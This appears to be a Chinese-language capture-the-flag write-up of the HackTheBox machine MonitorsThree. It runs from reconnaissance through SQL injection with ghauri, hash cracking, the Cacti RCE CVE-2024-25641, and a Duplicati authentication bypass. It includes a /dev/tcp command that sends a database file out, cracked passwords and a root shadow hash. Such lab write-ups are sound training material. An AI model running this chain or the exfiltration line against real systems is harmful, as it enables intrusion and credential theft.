data:image/s3,"s3://crabby-images/4d112/4d112e438d85b2545610a4999c9f1e53e0f37159" alt=""
Recon & Enum
Nmap Scan
1 | nmap -p- --min-rate 1000 -T4 -sC -sV -O -v [ip] |
VHost Scan
1 | ffuf -u http://monitorsthree.htb/ -H "Host: FUZZ.monitorsthree.htb" -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt -fs 13560 |
Cewl Scan
1 | cewl -w log/cewl_monitorsthree_htb.log http://monitorsthree.htb/ |
Shell as www-data
data:image/s3,"s3://crabby-images/ea6d9/ea6d91870ca14cea4b1c07745140430486a8656d" alt=""
查看主页发现登录接口
data:image/s3,"s3://crabby-images/24592/2459216e17846bdb4742a4443aa80b40caf05895" alt=""
1 | feroxbuster --no-state -u http://monitorsthree.htb/ -X php |
data:image/s3,"s3://crabby-images/9c25b/9c25b1eff4dd5c2c48e4cf36f438d4b5535624f9" alt=""
目录没发现什么有意思的东西,转到 cacti.monitorsthree.htb 看一下
data:image/s3,"s3://crabby-images/ca69a/ca69a30176d37284e1d6627f5ea6efcc8397316b" alt=""
搜索 Cacti 相关漏洞,CVE-2022-46169、CVE-2024-29895
其中 CVE-2022-46169 测试失败,目前暂时没有凭据,先看一下有没有其他洞,关于 Cacti 后台这里,不打算测试 SQL 注入,因为这个版本不是最新版,而且也没有搜到有 SQL 注入漏洞的相关信息,因此,把重点放在 monitorsthree.htb 的登录窗口中
data:image/s3,"s3://crabby-images/24bf9/24bf929ed49658b4361849e5d251172131617cd3" alt=""
data:image/s3,"s3://crabby-images/2ea53/2ea53e7139550c34eaed8f68ec232bf183314d99" alt=""
data:image/s3,"s3://crabby-images/08db1/08db10e33db5a1a5fca68f7d6678d63d457e7217" alt=""
这里明显可以看出,是存在 SQL 注入漏洞的,那么使用自动化工具跑一下
data:image/s3,"s3://crabby-images/d9d27/d9d27d412bf44fad66c57c54ccc48f760b4d2557" alt=""
Sqlmap 可以识别注入,但是始终跑不出来,换成 ghauri 试一下
data:image/s3,"s3://crabby-images/c03c5/c03c573646c7a76ddcec8c259cd4fefbdf422f29" alt=""
这里发现了报错注入,那速度将会飞起
1 | ghauri --batch -r forgot_pass.req --dbs |
data:image/s3,"s3://crabby-images/00221/002214146f726a7c3f2e00411cd84ab861fddefe" alt=""
1 | ghauri --batch -r forgot_pass.req -D monitorsthree_db --tables |
data:image/s3,"s3://crabby-images/a89e2/a89e2fb3bf541bd0b4c1b6742b3ce2d5581bf639" alt=""
1 | ghauri --batch -r forgot_pass.req -D monitorsthree_db -T users --dump |
data:image/s3,"s3://crabby-images/b4b9c/b4b9c8be32a2d119c5bbcd567204e150e7b142f0" alt=""
data:image/s3,"s3://crabby-images/06867/06867b184bc094ba86c168810ccbcb0a5289a148" alt=""
1 | hashcat -m 0 31a181c8372e3afc59dab863430610e8 /usr/share/wordlists/rockyou.txt |
data:image/s3,"s3://crabby-images/24ed1/24ed1d742d7a2a27c6c1ee52d9cd79cab7c3805f" alt=""
找到管理员密码 Hash,爆破得到管理员密码 greencacti2001
data:image/s3,"s3://crabby-images/6761f/6761fd4c3b49c3014aeca306ff025cf8572e22cf" alt=""
根域名的后台可以登录,但是没啥功能点可利用
data:image/s3,"s3://crabby-images/0eda0/0eda0ed7f10b7324e188e13a8bf5f8f5d4b5c430" alt=""
Cacti 的后台也可以登录,找到一个需要认证的 RCE 漏洞 CVE-2024-25641
1 |
|
将上述脚本写入到文件中,执行 php payload.php
会生成一个 test.xml.gz 文件
data:image/s3,"s3://crabby-images/170a6/170a6120ea2ac35b9da91b055a14b57606cdd9d6" alt=""
在导入包功能栏这里导入 test.xml.gz 文件
data:image/s3,"s3://crabby-images/6e756/6e756a4730dcd9413d0e2655ba6a3cffbddf5bc5" alt=""
data:image/s3,"s3://crabby-images/22377/223773f4dbd0c6f923bcf7f775bf80537c77a149" alt=""
Local Enum
data:image/s3,"s3://crabby-images/07e4a/07e4afde0f0e1b69ca997474351de0f3ef40de0a" alt=""
data:image/s3,"s3://crabby-images/30ec5/30ec53a376d3f59e21dbc17d088c4acac6b8d7fd" alt=""
找到两份 mysql 的连接密码:cactiuser:cactiuser
、app_user:php_app_password
data:image/s3,"s3://crabby-images/d6772/d67721aed54488a5df70e870761d7e3ef07b8efa" alt=""
可以看到有个 marcus
用户
Shell as Marcus
app_user 是主域名下的服务,也就是前面 SQL 注入的数据库,因此这里使用 cactiuser 连接
data:image/s3,"s3://crabby-images/e4a5c/e4a5cb485eeeebba8f6940766f339ccc1a0c978d" alt=""
在 cacti 里面找到 这个用户的 Hash,爆破一下
data:image/s3,"s3://crabby-images/b2aea/b2aea48922f61e92487400730f46e826447a8038" alt=""
data:image/s3,"s3://crabby-images/0939c/0939c77ed737b0ba91e5171615907b37ea796843" alt=""
拿到密码了,但是无法登录 ssh,好像是设置了只有密钥登录,那么通过 su 来看一下
data:image/s3,"s3://crabby-images/b3d97/b3d975875f148f6ac3dec208af0d984872756465" alt=""
data:image/s3,"s3://crabby-images/55f6a/55f6a6c9a18fc9dd1e29e690775d84a904b1228d" alt=""
换成密钥就可以登录了
data:image/s3,"s3://crabby-images/2182b/2182b7d3b729dab785889beed3ffe67b49711c32" alt=""
查看本地环境,发现两个新端口
data:image/s3,"s3://crabby-images/efb99/efb9950ef71c62b5fe2c02996e1696c96a104a98" alt=""
尝试访问,发现被重定向到登录页面,而且也能看出是 Tiny WebServer 服务,大概有其他数据库。
data:image/s3,"s3://crabby-images/f1467/f1467bf58d8fa84ac57230b812dc5b5574329a58" alt=""
data:image/s3,"s3://crabby-images/812ac/812ac8c47049e2c1820006c74ab724c6583ba02a" alt=""
看到 docker-compose.yml 已经把根目录挂载了,那么思路清晰
Shell as Root
可以用 cat CTADPNHLTC.sqlite > /dev/tcp/[ip]/[port]
先下载下来
data:image/s3,"s3://crabby-images/282e0/282e052b63a43c75b5682a76632950e6c5ed6579" alt=""
先把 8200 端口代理出来,在 Duplicati-server.sqlite 中发现了一个密码,但是 Base64 解码得到了不可打印字符,这主要是和 Duplicati 的认证方式有关,在这篇文章中可以了解
data:image/s3,"s3://crabby-images/c7705/c7705ac63122b3e5e48cd875348e2c3697cc5a77" alt=""
先把 Server-passphrase 进行 Base64 decode + Hex Encode
data:image/s3,"s3://crabby-images/8aa47/8aa4751b7cf961e0389b1c7cecff3fe7be046214" alt=""
输入密码,拦截登录请求,获取第一个包的响应
data:image/s3,"s3://crabby-images/bca67/bca67e8486903ecd9b5d3658a8317f1056fa8227" alt=""
直接使用浏览器的 JS 获取 Hash
1 | var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('hmlBOyfckHdB69CIhVh3q/QIXqkio1xWl0iNc3vtDD8=') + '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a')).toString(CryptoJS.enc.Base64); |
data:image/s3,"s3://crabby-images/992b6/992b67821b2bbbb8a8a0c38af45d7f554f8d9f87" alt=""
放包,在第二个请求包中输入密码,并进行 Url Encode
data:image/s3,"s3://crabby-images/01ab5/01ab522eedc2abc86fed75d504d5248c94b7ea7a" alt=""
data:image/s3,"s3://crabby-images/f9c38/f9c381c865044a686c128c3bb554b4082ee023e7" alt=""
认证成功
data:image/s3,"s3://crabby-images/feb74/feb740082c18225bb3511c23a4b458285fbd09f9" alt=""
看到有备份功能,尝试创建新的备份
data:image/s3,"s3://crabby-images/50995/50995bd08981be7f93ff9b6586e2bb999f987736" alt=""
data:image/s3,"s3://crabby-images/362e8/362e8a88e1b877869c6c73d759551aebc1659f0d" alt=""
目标位置可以设置为 /source/tmp/
data:image/s3,"s3://crabby-images/9893c/9893c194fd93be46458fa5d0ac61810752560e05" alt=""
源数据选择 /source/root/
目录和 /source/etc/shadow
文件
data:image/s3,"s3://crabby-images/ea319/ea319c0a469a854068536db5e60c0968ed2de91b" alt=""
data:image/s3,"s3://crabby-images/2c090/2c0909a968370eea020c9d23037a1175497b1a09" alt=""
得到了三个文件
1 | duplicati-xxx.dlist.zip |
首先查看 dlist.zip 压缩包中的 filelist.json 文件,其中记录了所有文件名对应的 Hash
data:image/s3,"s3://crabby-images/05a27/05a27ea22ee4d7493c772005f95ed8fa11710494" alt=""
可惜没有私钥
data:image/s3,"s3://crabby-images/a93d5/a93d5a7dcd8dd51090bcce218a77260cb0f4f941" alt=""
可以找到 flag 的位置
data:image/s3,"s3://crabby-images/466fc/466fc01494bbc95da70ce1cf0b59bbe42a5213e6" alt=""
More
Root 权限
如何获取 root 权限呢,可以通过 Duplicati 的恢复功能,可以修改 /etc/passwd
也可以直接修改 /root/.ssh/authorized_keys
- 创建
/source/home/marcus/.ssh/authorized_keys
的备份 - 将备份恢复到
/source/root/.ssh/
目录中 - 使用 marcus 用户的私钥 ssh 登录即可
data:image/s3,"s3://crabby-images/6ce6f/6ce6fff4c67a16dc3f88eb5c90d41d88838fa9d6" alt=""
Dump Hash
1 | root:$y$j9T$3TDQ3GS5lSkNwiN4EsxVB/$Jyu3CWLTQ4mIypw/03JOtPle6vdpaoY/x6J9brbV9P4:19869:0:99999:7::: |